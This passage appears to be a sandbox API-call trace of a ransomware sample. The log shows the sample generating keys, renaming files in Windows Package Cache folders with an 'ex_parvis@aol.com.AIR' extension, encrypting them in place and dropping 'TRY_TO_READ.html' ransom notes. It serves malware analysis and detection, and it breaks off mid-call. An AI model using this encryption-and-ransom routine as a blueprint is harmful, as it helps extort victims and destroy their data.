SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", dwFileAttributes=0x80) returned 1 [0167.742] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 82 [0167.742] GetProcessHeap () returned 0x2e0000 [0167.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x31fae0 [0167.742] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" [0167.742] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0167.742] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.748] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0167.748] GetProcessHeap () returned 0x2e0000 [0167.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.748] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=654) returned 1 [0167.748] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x28e [0167.748] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.748] GetProcessHeap () returned 0x2e0000 [0167.748] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.748] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.748] WriteFile (in: hFile=0x58c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.750] WriteFile (in: hFile=0x58c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.750] WriteFile (in: hFile=0x58c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.750] ReadFile (in: hFile=0x58c, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x28e, lpOverlapped=0x0) returned 1 [0167.750] SetFilePointer (in: hFile=0x58c, lDistanceToMove=-654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.750] WriteFile (in: hFile=0x58c, lpBuffer=0x30f02e0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f02e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x28e, lpOverlapped=0x0) returned 1 [0167.750] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1d28 [0167.751] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0167.752] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1d68 [0167.752] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.752] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.752] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", dwFileAttributes=0x80) returned 1 [0167.753] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 89 [0167.753] GetProcessHeap () returned 0x2e0000 [0167.753] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x118) returned 0x319788 [0167.753] lstrcpyW (in: lpString1=0x319788, lpString2="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" [0167.753] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0167.753] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.755] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x594 [0167.755] GetProcessHeap () returned 0x2e0000 [0167.755] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319788 | out: hHeap=0x2e0000) returned 1 [0167.755] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=463016) returned 1 [0167.755] SetFilePointer (in: hFile=0x594, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x710a8 [0167.756] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.756] GetProcessHeap () returned 0x2e0000 [0167.756] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.756] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.756] WriteFile (in: hFile=0x594, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.758] WriteFile (in: hFile=0x594, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.758] WriteFile (in: hFile=0x594, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.760] ReadFile (in: hFile=0x594, lpBuffer=0x30f0048, nNumberOfBytesToRead=0x710a8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30f0048*, lpNumberOfBytesRead=0x2acf9c8*=0x710a8, lpOverlapped=0x0) returned 1 [0167.781] SetFilePointer (in: hFile=0x594, lDistanceToMove=-463016, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.781] WriteFile (in: hFile=0x594, lpBuffer=0x31d01e0*, nNumberOfBytesToWrite=0x710a8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x710a8, lpOverlapped=0x0) returned 1 [0167.785] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.785] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.785] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", dwFileAttributes=0x80) returned 1 [0167.786] lstrlenW (lpString="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned 82 [0167.786] GetProcessHeap () returned 0x2e0000 [0167.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10a) returned 0x30a498 [0167.786] lstrcpyW (in: lpString1=0x30a498, lpString2="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" [0167.786] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" [0167.786] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.789] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x594 [0167.789] GetProcessHeap () returned 0x2e0000 [0167.789] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30a498 | out: hHeap=0x2e0000) returned 1 [0167.789] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=666) returned 1 [0167.789] SetFilePointer (in: hFile=0x594, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x29a [0167.789] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.789] GetProcessHeap () returned 0x2e0000 [0167.790] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.790] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.790] WriteFile (in: hFile=0x594, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.791] WriteFile (in: hFile=0x594, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.791] WriteFile (in: hFile=0x594, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.791] ReadFile (in: hFile=0x594, lpBuffer=0x31d01e0, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesRead=0x2acf9c8*=0x29a, lpOverlapped=0x0) returned 1 [0167.791] SetFilePointer (in: hFile=0x594, lDistanceToMove=-666, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.791] WriteFile (in: hFile=0x594, lpBuffer=0x31d0488*, nNumberOfBytesToWrite=0x29a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d0488*, lpNumberOfBytesWritten=0x2acf9c8*=0x29a, lpOverlapped=0x0) returned 1 [0167.792] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1da8 [0167.792] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x598 [0167.793] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1de8 [0167.794] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x59c [0167.796] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1e28 [0167.796] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0167.797] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb19f7bd0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb19f7bd0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1e68 [0167.798] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0167.801] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xb1a1dd30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a1dd30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ea8 [0167.801] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a8 [0167.802] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb1a1dd30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a1dd30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1ee8 [0167.803] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0167.805] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb1a1dd30, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a1dd30, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1f28 [0167.805] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0167.807] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xb1a43e90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb1a43e90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b1f68 [0167.808] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.808] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.808] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", dwFileAttributes=0x80) returned 1 [0167.808] lstrlenW (lpString="C:\\\\Users\\All Users\\Package 